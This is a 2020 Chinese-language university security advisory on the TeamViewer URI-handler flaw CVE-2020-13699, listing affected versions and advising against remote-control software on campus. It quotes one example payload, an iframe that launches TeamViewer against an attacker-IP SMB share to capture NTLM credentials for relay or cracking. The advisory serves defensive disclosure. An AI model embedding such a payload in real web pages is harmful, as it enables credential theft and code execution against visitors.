加入收藏 | 主站

关于TeamViewer用户密码破解漏洞(CVE-2020-13699)的预警提示

作者: 时间:2020-08-31 点击数:

一、基本情况

近日,监测到TeamViewer官方发布了TeamViewer URL处理的风险通告,当安装了TeamViewer的易受攻击版本的用户访问恶意创建的网站时,可能被远程攻击者利用来破解用户的密码,从而导致进一步的系统利用。

二、漏洞详情

TeamViewer是由德国公司TeamViewer GmbH开发的应用程序,可用于WindowsmacOSLinuxChrome OSiOSAndroidWindows RTWindows Phone 8BlackBerry操作系统。它主要用于远程访问和控制各种类型的计算机系统和移动设备,但也提供协作和演示功能(例如,桌面共享,Web会议,文件传输等)。

TeamViewer存在未引用的搜索路径或元素的安全缺陷,由于应用程序没有正确引用它的自定义URI处理程序,当安装有TeamViewer的易受攻击版本的系统访问恶意创建的网站时,可能会被利用。

攻击者可以使用精心制作的URLiframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs')将恶意iframe嵌入网站中,从而启动TeamViewer Windows桌面客户端并强制其打开远程SMB共享。

Windows将在打开SMB共享时,执行NTLM身份验证,并且可以转发该请求(使用如响应程序之类的工具)以执行代码(或捕获该请求以进行哈希破解)。

三、影响范围

TeamViewer<8.0.258861

TeamViewer<9.0.28860

TeamViewer<10.0.258873

TeamViewer<11.0.258870

TeamViewer<12.0.258869

TeamViewer<13.2.36220

TeamViewer<14.2.56676

TeamViewer<15.8.3

四、修复建议

建议校园网内不使用远控类产品。

CopyRight © 2020 南京财经大学网络安全与信息化办公室 版权所有

通信地址:江苏省南京市仙林大学城文苑路3号    邮政编码:210023